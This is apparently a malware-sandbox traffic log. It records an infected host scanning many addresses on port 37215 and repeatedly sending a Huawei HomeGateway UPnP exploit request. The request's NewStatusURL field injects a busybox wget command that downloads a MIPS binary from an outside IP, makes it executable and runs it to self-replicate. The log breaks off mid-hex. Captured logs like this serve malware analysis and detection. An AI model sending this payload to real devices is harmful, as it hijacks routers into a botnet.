            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.10.239.74:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 20.237.60.101:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.101.110.117:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.148.47.38:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.223.241.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.176.120.5:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.209.44.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.28.183.75:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.166.107.60:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.70.106.103:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.156.58.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.198.184.42:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.45.31.62:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.159.206.9:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.138.236.146:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 38.14.72.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.5.100.175:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.39.154.29:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 91.155.59.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.157.76.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.54.186.61:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.250.58.103:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.138.247.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.232.129.31:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.179.85.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 167.199.49.200:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.186.246.96:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 34.201.26.218:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.231.169.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.10.147.91:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.54.117.163:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 113.2.189.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 49.129.243.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 74.141.17.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 90.95.108.221:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.187.210.119:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.188.197.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.130.53.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.10.2.245:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.9.240.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 205.74.112.51:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.213.234.198:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 46.246.65.215:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 169.217.59.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 58.175.224.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.212.69.97:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 197.192.17.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.145.8.162:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 110.61.116.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 194.65.90.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 41.210.134.149:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 219.232.77.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 150.219.3.247:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 158.79.112.36:37215
            Source: global trafficTCP traffic: 192.168.2.23:1535 -> 157.139.9.188:37215
            Source: global traffic
            HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Connection: keep-alive
            Accept: */*
            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
            Content-Length: 457
            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade 
xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 156.224.24.249 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 36 2e 32 32 34 2e 32 34 2e 32 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 